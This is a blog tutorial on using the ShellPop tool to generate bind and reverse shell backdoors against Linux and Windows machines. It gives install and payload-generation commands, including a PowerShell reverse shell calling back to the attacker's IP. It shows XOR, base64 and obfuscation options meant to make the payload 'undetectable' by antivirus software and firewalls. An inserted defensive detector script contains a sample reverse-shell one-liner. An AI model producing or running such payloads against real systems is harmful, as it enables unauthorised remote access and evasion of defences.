by hash3liZer . 18 September 2018
Delivering a successful exploit against any target OS requires a payload that gives the attacker access to the remote system, and shellpop is all about that. It provides various obfuscation tweaks to bypass AVs and firewalls. Getting a working shell on a target is always a pain, and bypassing firewalls is one of the major problems. Shellpop makes all of that easy for us.
It's all about popping stealthy shells, i.e. a terminal, cmd, PowerShell etc. It comes with both bind and reverse shells for Windows and Linux. Since both are widely used, this leaves us with a large audience.
Bind and Reverse Shells:
A backdoor is maintained by opening a remote connection to or from the target machine. One of the two machines, the attacker's or the target's, has to provide a handler (a listener) that the other one connects to.
Bind shells open a listening port on the target machine; once the payload has executed, the attacker connects to that port.
There is a chance that the target system is protected by a firewall, or that an AV installed on the system stops the payload from opening a listening port. Reverse shells help in such situations: here the handler is spawned by the attacker on his own machine and the victim connects back to the attacker.
Both have pros and cons depending on the situation. For example, if you are attacking a server that is directly connected to the Internet, you probably want a bind shell, while if the target is a machine behind NAT or a firewall, a reverse shell is much more useful.
Update and install the dependencies:
$ sudo apt-get update
$ sudo apt-get install python-argcomplete metasploit-framework -y
Clone shellpop from GitHub and install it:
$ git clone https://github.com/0x00-0x00/ShellPop.git
$ cd ShellPop && pip install -r requirements.txt
$ python setup.py install # Install ShellPop
Next you have to choose the payload for your target. To see the list of available payloads, type the --payload argument and press the Tab key:
$ shellpop --payload [TAB Key]
Let our target be a Linux box on some VPS. Since the server is directly connected to the Internet, we can use a bind payload. Narrowing the search to the required environment:
$ shellpop --payload linux/bind/[TAB Key]
We are left with a few payloads. From this list we will prefer tcp over udp, since udp is a connectionless protocol. The listed interpreters, e.g. python and php, are normally installed on Linux systems, so let's choose python as the payload type:
$ shellpop --payload linux/bind/tcp/python
To generate the payload, an IP and a port on which the connection will be bound are required. Further, a handler will be set up to handle the connect-back or connect-to side.
$ shellpop --bind --payload linux/bind/tcp/python --port 6877 --handler \
    --clip
Now, all I have to do is execute this payload on the target machine.
Reverse Shell for Windows:
Let's consider another scenario where the user is on Windows and is behind NAT (Network Address Translation), i.e. has a private IP address and is not directly accessible from the outside world. In this case, we can generate a reverse PowerShell payload:
$ shellpop --reverse --payload windows/reverse/tcp/powershell --host [YOUR IP] --port 6877 \
    --handler --clip
Remember, on a LAN you can use your private IP, but over the WAN you have to use your public IP and set up port forwarding on your router so that traffic reaching the router is passed on to your device. Since port forwarding is another pain in the butt, you can buy a VPS for $5 from DigitalOcean.
Now you have to somehow execute the payload on the target machine. It could be done manually, through vulnerable application logic, a file upload, a vulnerable parameter, etc. I'll skip this part and leave it for you to work out your own way. On successful execution, we get the shell through the handler. Here's the handler for the Linux bind shell after I executed the payload on the target machine:
The generated payload was a very simple one and can easily be detected by a firewall. ShellPop provides encoding and simple obfuscation techniques to overcome such situations. The available encoders are:
--xor Enable XOR obfuscation
--base64 Encode command in base64.
--urlencode Encode the command in URL encoding.
You can also apply a small amount of obfuscation to the payload. For example, to generate an undetectable backdoor:
$ shellpop --bind --payload linux/bind/tcp/python --port 6877 --handler \
    --clip --xor --ipfuscate --obfuscate-small
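As an added example, not from the original post or the ShellPop project, here is a defender's-side triage check for the base64 and URL-encoding layers those encoders add. It peels the layers from constructed web-access log lines (the /run?cmd= parameter, the marker lists and the sample command are assumptions) and flags a request whose decoded command combines a socket call with a process-spawning module.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

# Marker pairs typical of interpreter-based bind/reverse shells: a socket call plus
# something that spawns a process; both must appear for a "suspect" verdict.
SOCKET_MARKERS = ("socket", "connect(", "bind(", "listen(")
EXEC_MARKERS = ("subprocess", "os.dup2", "pty.spawn", "/bin/sh", "cmd.exe", "powershell")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def decode_layers(text, max_depth=3):
    """Peel URL-encoding and base64 layers; return every form seen, outermost first."""
    forms = [text]
    for _ in range(max_depth):
        changed = False
        unquoted = unquote(text)
        if unquoted != text:
            text, changed = unquoted, True
            forms.append(text)
        for blob in B64_RE.findall(text):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # a long token that merely looks like base64
            text, changed = text.replace(blob, decoded), True
            forms.append(text)
        if not changed:
            break
    return forms

def classify(line):
    """Return (verdict, layers_peeled) for one log line."""
    forms = decode_layers(line)
    joined = "\n".join(forms)
    suspect = any(m in joined for m in SOCKET_MARKERS) and any(m in joined for m in EXEC_MARKERS)
    return ("suspect" if suspect else "clean", len(forms) - 1)

# Constructed web-access log lines (not real telemetry): a "cmd" parameter carrying a
# socket-plus-subprocess one-liner in plain, URL-encoded and base64 form, plus benign hits.
SAMPLE_CMD = 'python -c "import socket,subprocess;s=socket.socket();s.connect((\'192.0.2.10\',6877))"'
SAMPLE_B64 = base64.b64encode(SAMPLE_CMD.encode()).decode()
SAMPLE_LOG = [
    '203.0.113.5 - - "GET /index.html HTTP/1.1" 200',
    '203.0.113.5 - - "GET /img?file=%2Fvar%2Fwww%2Flogo.png HTTP/1.1" 200',
    f'198.51.100.7 - - "GET /run?cmd={quote(SAMPLE_CMD, safe="")} HTTP/1.1" 200',
    f'198.51.100.7 - - "GET /run?cmd={quote(SAMPLE_B64, safe="")} HTTP/1.1" 200',
]
```

The --xor layer needs the key and is not peeled here, so the verdict is a triage signal to confirm with host telemetry, not proof.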
There's always a better way of popping shells on a target machine. Shells come in two types, bind and reverse. Bind shells listen on the target side, while reverse shells listen on the attacker side; either way the purpose is the same, a shell bound to a connection between the two machines, i.e. a backdoor. Sometimes firewalls detect the malicious payload and stop further execution. Obfuscating the payload can sometimes help bypass these firewalls.